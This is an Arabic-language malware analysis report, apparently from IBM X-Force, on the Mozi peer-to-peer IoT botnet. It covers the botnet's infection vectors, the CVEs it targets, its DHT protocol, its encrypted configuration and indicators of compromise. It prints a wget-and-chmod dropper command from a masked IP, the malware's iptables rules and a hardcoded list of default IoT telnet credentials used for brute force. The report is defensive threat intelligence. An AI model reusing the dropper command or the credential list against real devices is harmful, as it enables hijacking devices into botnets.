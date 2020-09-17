اكتشفت IBM X-Force أن هناك لاعبًا جديدًا نسبيًا في مجال التهديدات، وهو شبكة الروبوتات Mozi، قد انتشر بشكل كبير بين أجهزة إنترنت الأشياء (IOT).
هذا البرنامج الضار نشط منذ أواخر 2019 ويتداخل كوده مع كود Mirai وإصداراته. استحوذ Mozi على ما يقرب من 90% من حركة مرور شبكة إنترنت الأشياء (IOT) في الفترة ما بين أكتوبر 2019 حتى يونيو 2020.
وقد صاحب هذا الاستحواذ المذهل زيادة كبيرة في نشاط شبكة روبوتات إنترنت الأشياء (IOT) بشكل عام، ما يشير إلى أن Mozi لم يُخرج منافسيه من السوق. بل على العكس، فقد غمروا السوق، ما قلل من نشاط الإصدارات الأخرى. بشكل عام، كانت حالات هجوم إنترنت الأشياء المجمعة في الفترة ما بين أكتوبر 2019، عندما بدأت الهجمات في الزيادة بشكل ملحوظ، وحتى يونيو 2020 أعلى بنسبة 400% من حالات هجوم إنترنت الأشياء المجمعة طوال العامين السابقين.
قد ترجع هذه الزيادة في هجمات إنترنت الأشياء إلى عدة الأسباب، ولكنها قد تكون ناتجة جزئيًا عن التوسع المستمر في مجال إنترنت الأشياء الذي يستهدفه عناصر التهديد. يوجد حوالي 31 مليار جهاز إنترنت الأشياء (IOT) منتشر حول العالم، ويبلغ معدل نشر إنترنت الأشياء (IOT) الآن 127 جهازًا في الثانية.
لقد استغل المهاجمون هذه الأجهزة منذ فترة، لا سيما عبر شبكة الروبوتات Mirai. وقد كان فريق خدمات الاستجابة للحوادث والاستخبارات (IRIS) في IBM X-Force يتابعها منذ ما يقرب من أربع سنوات. لكن ما سبب الزيادة المفاجئة؟ تشير أبحاث IBM إلى استمرار نجاح Mozi بشكل كبير من خلال استخدام هجمات حقن الأوامر (CMDi)، والتي غالبًا ما تنتج عن أخطاء تكوينات أجهزة إنترنت الأشياء (IOT). ويُعد نمو استخدام إنترنت الأشياء (IOT) وبروتوكولات التكوين الضعيفة من الأسباب المحتملة وراء هذه الزيادة. وربما تكون هذه الزيادة قد تعززت أكثر بسبب زيادة الوصول المتكرر إلى شبكات الشركات عن بُعد بسبب كوفيد-19.
يمكن استخدام شبكة روبوتات إنترنت الأشياء (IOT) لتنفيذ هجمات موزعة لحجب الخدمة (DDoS)، وسرقة البيانات، وإرسال الرسائل المزعجة. يوجد عدد كبير من الأنواع المختلفة من أجهزة إنترنت الأشياء (IOT) التي يمكن استغلالها:
نطاق الهجوم الكبير هذا يجعل المؤسسات عرضة لخطر شبكة روبوتات إنترنت الأشياء (IOT). أضف إلى ذلك الثغرات الأمنية التي غالبًا ما تكون موجودة في هذه الأجهزة عند شرائها، وممارسات التعزيز الأمني غير الجادة عند النشر. تأتي الثغرة الأبرز في إنترنت الأشياء (IOT) عبر هجمات حقن الأوامر.
حاولت تقريبًا جميع عمليات استهداف إنترنت الأشياء التي رصدتها IBM استخدام هجمات حقن الأوامر بهدف الوصول الأولي إلى الجهاز. وإذا كانت نقطة النهاية المستهدفة جهاز إنترنت الأشياء (IOT) وكانت عرضة لهذه الهجمات، فسيتم تنزيل الحمولة وتنفيذها.
هجمات حقن الأوامر شائعة جدًا ضد أجهزة إنترنت الأشياء (IOT) لأسباب عدة. أولاً، تحتوي أنظمة إنترنت الأشياء (IOT) المضمنة عادةً على واجهة ويب وواجهة تصحيح أخطاء متبقية من عملية تطوير البرامج الثابتة ويمكن استغلالهما. ثانيًا، يمكن استغلال وحدات PHP المدمجة في واجهات الويب الخاصة بإنترنت الأشياء (IOT) لمنح العناصر الخبيثة فرصة التنفيذ عن بُعد. وثالثًا، غالبًا ما تُترك واجهات إنترنت الأشياء (IOT) عرضة للخطر عند نشرها لأن المسؤولين يفشلون في تعزيز أمن الواجهات من خلال تنقية المدخلات عن بُعد المتوقعة. يسمح ذلك لعناصر التهديد بإدخال أوامر shell مثل "wget".
كشف تحليلنا أن شبكة الروبوتات Mozi تستفيد من هجمات حقن الأوامر باستخدام أمر shell المسمى “wget”، ثم تُغير الأذونات للسماح لعنصر التهديد بالتفاعل مع النظام المتأثر. على سبيل المثال:
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
إذا كان المضيف عرضة لهجمات حقن الأوامر، فسيؤدي هذا الأمر إلى تنزيل ملف يُسمى "mozi.a." وتنفيذه. يشير تحليلنا لهذه العينة تحديدًا إلى أن الملف يُنفذ على بنية معالج دقيق من دون مراحل متشابكة (MIPS). وهذا الامتداد تفهمه الأجهزة التي تعمل على بنية كمبيوتر مجموعة التعليمات المخفضة (RISC)، وهي سائدة في العديد من أجهزة إنترنت الأشياء (IOT). بمجرد أن يحصل المهاجم على صلاحية وصول كامل إلى الجهاز عبر شبكة الروبوتات، يمكن تغيير مستوى البرامج الثابتة وزرع برنامج ضار آخر على الجهاز.
على الرغم من أن هذا المثال يستشهد بمتجه معروف، فإنه قد يظل فعالاً لسببين رئيسيين. أولاً، تسمح الثغرات الأمنية الجديدة بالتحديث المستمر لمحاولات الاستغلال عبر هجمات حقن الأوامر، ويمكن استغلال التنفيذ البطيء للتحديثات الأمنية. ثانيًا، يمكن أتمتة هذا النشاط بسهولة، ما يسمح لعناصر التهديد بضرب شريحة واسعة من الأجهزة بسرعة وبتكلفة منخفضة.
يبدو أن المصدر الرئيسي للبنية التحتية لشبكة الروبوتات Mozi هو الصين، حيث تستحوذ على 84% من البنية التحتية المرصودة. تتماشى هذه الحقيقة مع بحث آخر مفتوح المصدر حول نشاط إنترنت الأشياء (IOT) في عام 2020.
فيما يلي قائمة بالثغرات التي رصدتها IBM والتي تحاول شبكة الروبوتات Mozi استغلالها:
|الثغرة الأمنية
|الجهاز المتأثر
|CVE-2017-17215
|هواوى HG532
|CVE-2018-10561 / CVE-2018-10562
|أجهزة توجيه GPON
|CVE-2014-8361
|الأجهزة التي تستخدم Realtek SDK
|جهاز التوجيه اللاسلكي Eir D1000 RCI
|جهاز التوجيه اللاسلكي Eir D1000
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi RCE غير الموثقة
|Netgear DGN1000
|تنفيذ أوامر MVPower DVR
|MVPower DVR TV-7104HE
|CVE-2015-2051
|أجهزة D-Link
|تنفيذ أوامر D-Link UPnP SOAP
|أجهزة D-Link
|موردو CCTV-DVR RCE
|موردو CCTV-DVR المتعددون
شبكة الروبوتات Mozi هي شبكة روبوتات من نظير إلى نظير (P2P) تعتمد على بروتوكول جدول التجزئة العشوائي الموزع (DSHT)، والتي يمكن أن تنتشر عبر استغلال ثغرات أجهزة إنترنت الأشياء (IOT) وكلمات مرور telnet الضعيفة.
عند التنفيذ، تحاول شبكة الروبوتات Mozi ربط منفذ UDP المحلي رقم 14737. تقرأ العينة /proc/net/tcp أو /proc/net/raw للعثور على العمليات التي تستخدم المنفذين 1536 و5888 وإيقافها. تتحقق العينة مما إذا كان الملف /usr/bin/python موجودًا. وإذا كان موجودًا، فستغير العينة اسم عمليتها إلى sshd. وإن لم يكن موجودًا، فستغير العينة الاسم إلى dropbear.
من المعروف أن شبكة روبوتات Mozi تتمتع بسمتين فريدتين على الأقل. تستخدم ECDSA384 (خوارزمية التوقيع الرقمي للمنحنى الإهليلجي 384) للتحقق من سلامتها. بالإضافة إلى ذلك، تُعيد استخدام أجزاء من كود Gafgyt.
وتحتوي على عُقد DHT عامة مشفرة ضمنيًا، والتي يمكن استخدامها للانضمام إلى شبكة النظير إلى النظير (P2P). فيما يلي هذه العُقد:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
تحتوي شبكة الروبوتات Mozi على أربع إمكانات رئيسية. يمكنها تنفيذ هجوم موزع لحجب الخدمة (DDoS) (HTTP، وTCP، وUDP)؛ وتنفيذ هجوم تنفيذ الأوامر؛ وتنزيل الحمولة الخبيثة من عنوان URL محدد وتنفيذها؛ وجمع معلومات حول الروبوت.
يحتوي الجدول أدناه على تفاصيل موجزة حول الملفات التي جرى تحليلها. تشمل التفاصيل الملفات المرسلة والملفات المتبقية. (الملفات المتبقية هي ملفات تُستخرج بشكل ثابت أو ديناميكي في أثناء تحليل البرنامج الضار.) تشمل البيانات اسم الملف، وفئة الملف كما يحددها التحليل، وتجزئة الملف، ونسب الملف بالنسبة إلى الملفات الأخرى في الجدول.
|اسم الملف
|فئة الملف
|تجزئة الملف
|الملف الأصلي
|mozi.m
|شبكة الروبوتات
|4dde761681684d7edad4e5e1ffdb940b
|لا ينطبق
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|شبكة الروبوتات
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|شبكة الروبوتات
|9a111588a7db15b796421bd13a949cd4
|لا ينطبق
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|شبكة الروبوتات
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
عند التنفيذ، تحاول العينة ربط منفذ UDP المحلي رقم 14737. تقرأ العينة /proc/net/tcp أو /proc/net/raw للعثور على العمليات التي تستخدم المنفذين 1536 و5888 وإيقافها. تتحقق العينة مما إذا كان الملف /usr/bin/python موجودًا. وإذا كان موجودًا، فستغير العينة اسم عمليتها إلى sshd. وإن لم يكن موجودًا، فستغير العينة الاسم إلى dropbear.
تحاول العينة أيضًا تحديث قائمة التحكم في الوصول لحظر بروتوكولي SSH وtelnet بهدف منع شبكات الروبوت الأخرى من استخدامهما.
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
كما أنها تختار بشكل عشوائي المنافذ المشفرة ضمنيًا في iptable:
تستخدم شبكة الروبوتات Mozi بروتوكول DHT مخصصًا لتطوير شبكة النظير إلى النظير. تُجرى عملية انضمام عقدة Mozi الجديدة إلى شبكة DHT على النحو التالي:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
تحتاج العينة إلى إنشاء معرّف للعقدة الحالية. وفقًا لتقرير 360 Netlab حول Mozi، "يبلغ المعرّف 20 بايت ويتكون من البادئة 888888 المضمنة في العينة أو البادئة المحددة في ملف التكوين [hp]، بالإضافة إلى سلسلة مُنشأة عشوائيًا." يظهر ملف التكوين أدناه:.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
للانضمام إلى شبكة DHT، تُرسل العينة استعلام ping إلى عُقد DHT العامة والمشفرة ضمنيًا هذه. يظهر استعلام ping مع معرّف العقدة في حركة المرور في شكل Wireshark أدناه
تُضغط كلتا العينتين باستخدام أداة ضغط UPX مخصصة. فهي تمحو قيمة p_file_size وp_blocksize وتحولها إلى الصفر في بنية p_info.
تحتوي العينة على ملف تكوين مشفر ضمنيًا، معروض أدناه:
يحتوي على أربعة أقسام:
تُشفر بيانات التكوين باستخدام مفتاح XOR مشفر ضمنيًا، وهو 4E665A8F80C8AC238DAC4706D54F6F7E. تظهر بيانات التكوين بعد فك تشفيرها أدناه:
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
تدعم بيانات التكوين أوامر متعددة موسومة بعلامات على النحو التالي:
|العلامة (الأمر)
|الوصف
|[ss]
|دور الروبوت
|[ssx]
|تمكين/تعطيل العلامة [ss]
|[cpu]
|بنية وحدة المعالجة المركزية
|[cpux]
|تمكين/تعطيل العلامة [cpu]
|[nd]
|عقدة DHT الجديدة
|[hp]
|بادئة تجزئة عقدة DHT
|[atk]
|نوع الهجوم الموزع لحجب الخدمة (DDoS)
|[ver]
|القيمة في القسم V من بروتوكول DHT
|[sv]
|تحديث التكوين
|[ud]
|تحديث الروبوت
|[dr]
|تنزيل الحمولة من عنوان URL المحدد وتنفيذها
|[rn]
|تنفيذ الأمر المحدد
|[dip]
|عنوان IP والمنفذ المطلوبان لتنزيل روبوت Mozi
|[idp]
|الإبلاغ عن الروبوت
|[count]
|عنوان URL المستخدم للإبلاغ عن الروبوت
تُعيد شبكة الروبوتات Mozi استخدام أجزاء من كود Gafgyt في الهجوم الموزع لحجب الخدمة (DDoS). وتدعم أنواعًا متعددة من الهجوم الموزع لحجب الخدمة (DDoS) مثل HTTP وTCP وUDP.
يُستخدم توقيع ECDSA384 الأول للتحقق من قيمة التجزئة الخاصة ببيانات التكوين. فيما يلي المفتاح العام المشفر ضمنيًا والمستخدم للتحقق منها:
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
تُشفر باستخدام مفتاح XOR التالي: 4E665A8F80C8AC238DAC4706D54F6F7E. فيما يلي المفتاح العام بعد فك تشفيره:
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
يحدد إصدار التكوين وقت تحديث الروبوت. سيُحدّث الروبوت عندما تكون هذه القيمة أكبر من القيمة الحالية. يُستخدم توقيع ECDSA384 الثاني للتحقق من الأجزاء الثلاثة الأولى من ملف التكوين. فيما يلي المفتاح العام المشفر ضمنيًا والمستخدم للتحقق منها:
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
تُشفر باستخدام مفتاح XOR التالي: 4E665A8F80C8AC238DAC4706D54F6F7E. فيما يلي المفتاح العام بعد فك تشفيره:
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
بالإضافة إلى الثغرات التي تستغلها شبكة الروبوتات Mozi لكي تتمكن من الوصول إلى الجهاز المستهدف، يمكن لشبكة الروبوتات Mozi أيضًا تنفيذ هجمات القوة الغاشمة للحصول على بيانات اعتماد telnet، وذلك باستخدام قائمة مشفرة ضمنيًا من بيانات الاعتماد:
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
فيما يلي أحد هجمات القوة الغاشمة للحصول على بيانات تسجيل الدخول عبر telnet والتي استخدمتها العينة:
Mozi.m وMozi.a
الشبكة
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
سلاسل بارزة (غير مضغوطة)
8.8.8.8 /proc/net/route Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0) Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0) Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] This node doesn’t accept announces dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
يستمر مجال شبكة روبوتات إنترنت الأشياء (IOT) في التغير، وتشير بيانات IBM Security إلى أن عناصر التهديد لا تزال نشطة في هذا المجال. في ظل عمل مجموعات شبكة الروبوتات الحديثة، مثل Mozi، على تكثيف عملياتها وزيادة نشاط إنترنت الأشياء بشكل عام، يجب على المؤسسات التي تستخدم أجهزة إنترنت الأشياء أن تكون على دراية بالتهديد المتطور. تشهد شركة IBM تزايدًا في تعرض أجهزة إنترنت الأشياء (IOT) المؤسسية لهجمات المهاجمين. ويظل حقن الأوامر هو الناقل الأساسي للإصابات والمفضل لعناصر التهديد، ما يؤكد أهمية تغيير الإعدادات الافتراضية للأجهزة واستخدام اختبار اختراق فعال لاكتشاف الثغرات في أنظمة الحماية وإصلاحها.
بيانات Mozi.m الوصفية
|اسم الملف:
|Mozi.m
|حجم الملف:
|108808
|MD5:
|4dde761681684d7edad4e5e1ffdb940b
|SHA1:
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256:
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|نوع الملف:
|ملف ELF 32 بت MSB تنفيذي، MIPS، MIPS-I الإصدار 1 (SYSV)، مرتبط بشكل ثابت، ومجرد
|الفئة:
|شبكة الروبوتات
|اسم IRIS:
|Mozi
|أسماء أخرى:
بيانات Mozi.a الوصفية
|اسم الملف:
|Mozi.a
|حجم الملف:
|95268
|MD5:
|9a111588a7db15b796421bd13a949cd4
|SHA1:
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256:
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|نوع الملف:
|ملف ELF 32 بت LSB تنفيذي، ARM، الإصدار 1، مرتبط بشكل ثابت، ومجرد
|الفئة:
|شبكة الروبوتات
|اسم IRIS:
|Mozi
|أسماء أخرى:
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata البيانات الوصفية
|اسم الملف:
|d546_unpacked
|حجم الملف:
|266108
|MD5:
|86d42d968d3d12c36722e16c78e49ffb
|SHA1:
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256:
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|نوع الملف:
|ملف ELF 32 بت MSB تنفيذي، MIPS، MIPS-I الإصدار 1 (SYSV)، مرتبط بشكل ثابت، ومجرد
|الفئة:
|شبكة الروبوتات
|اسم IRIS:
|Mozi
|أسماء أخرى:
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d البيانات الوصفية
|اسم الملف:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|حجم الملف:
|212464
|MD5:
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1:
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|نوع الملف:
|ملف b’ELF 32 بت LSB تنفيذي، ARM، الإصدار 1، مرتبط بشكل ثابت، ومجرد’
|الفئة:
|شبكة الروبوتات
|اسم IRIS:
|Mozi
|أسماء أخرى: